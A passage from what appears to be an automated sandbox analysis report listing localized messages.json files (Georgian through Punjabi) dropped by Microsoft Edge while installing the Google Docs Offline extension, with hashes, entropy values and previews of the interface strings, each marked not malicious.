SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
